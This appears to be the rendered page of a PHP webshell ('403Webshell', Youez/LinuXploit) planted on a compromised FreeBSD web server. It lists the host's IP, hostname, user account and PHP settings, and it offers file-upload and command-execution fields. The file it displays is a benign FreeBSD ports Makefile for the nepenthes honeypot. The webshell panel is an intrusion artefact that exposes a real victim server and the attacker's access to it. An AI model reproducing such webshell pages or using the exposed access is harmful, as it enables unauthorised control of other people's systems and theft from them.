403Webshell
Server IP : 82.208.35.60  /  Your IP : 216.73.216.89
Web Server : Apache/2.4.55 (FreeBSD) OpenSSL/1.1.1q-freebsd PHP/7.3.31
System : FreeBSD server7.d2m.cz 12.4-RELEASE-p9 FreeBSD 12.4-RELEASE-p9 GENERIC amd64
User : studiokobylisy_cz ( 1008)
PHP Version : 7.3.31
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /usr/ports/net/nepenthes/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/ports/net/nepenthes/Makefile
PORTNAME=	nepenthes
PORTVERSION=	0.2.2
PORTREVISION=	16
CATEGORIES=	net
MASTER_SITES=	SF/${PORTNAME}/Nepenthes%20development/${PORTVERSION}

MAINTAINER=	ports@FreeBSD.org
COMMENT=	Determine the malware activity on a network
WWW=		http://nepenthes.carnivore.it/

LIB_DEPENDS=	libpcre.so:devel/pcre \
		libadns.so:dns/adns \
		libcurl.so:ftp/curl \
		libmagic.so.1:sysutils/file

USES=		dos2unix libtool perl5
USE_CXXSTD=	gnu++98
USE_GCC=	yes
GNU_CONFIGURE=	yes
CONFIGURE_ARGS=	--localstatedir=/var
INSTALL_TARGET=	install-strip

CPPFLAGS+=	-I${LOCALBASE}/include
LDFLAGS+=	-L${LOCALBASE}/lib

OPTIONS_DEFINE=		DEBUG_LOGGING PRELUDE

DEBUG_LOGGING_CONFIGURE_ENABLE=	debug-logging
PRELUDE_LIB_DEPENDS=	libprelude.so:security/libprelude
PRELUDE_CONFIGURE_ENABLE=	prelude

post-patch:
	@${FIND} ${WRKSRC} -name Makefile.in -print0 | ${XARGS} -0 \
		${REINPLACE_CMD} -e \
		's|-Werror|| ; \
		 s|-D.*_GNU_SOURCE||'
	@${FIND} ${WRKSRC}/modules -name "*.[ch]pp" -print0 | ${XARGS} -0 \
		${REINPLACE_CMD} -e \
		'/<curl\/types.h>/d'
	@${REINPLACE_CMD} -e \
		's|-I/usr/local/include|| ; \
		 s|-I/usr/src/contrib/file/|| ; \
		 s|-L/usr/local/lib|| ; \
		 s|-R/usr/local/lib||' ${WRKSRC}/configure

post-install:
	@${MKDIR} ${STAGEDIR}${DATADIR}/signatures
	(cd ${WRKSRC}/modules/shellcode-signatures && ${INSTALL_DATA} \
		shellcode-signatures.sc ${STAGEDIR}${DATADIR}/signatures)

.include <bsd.port.mk>

Youez - 2016 - github.com/yon3zu
LinuXploit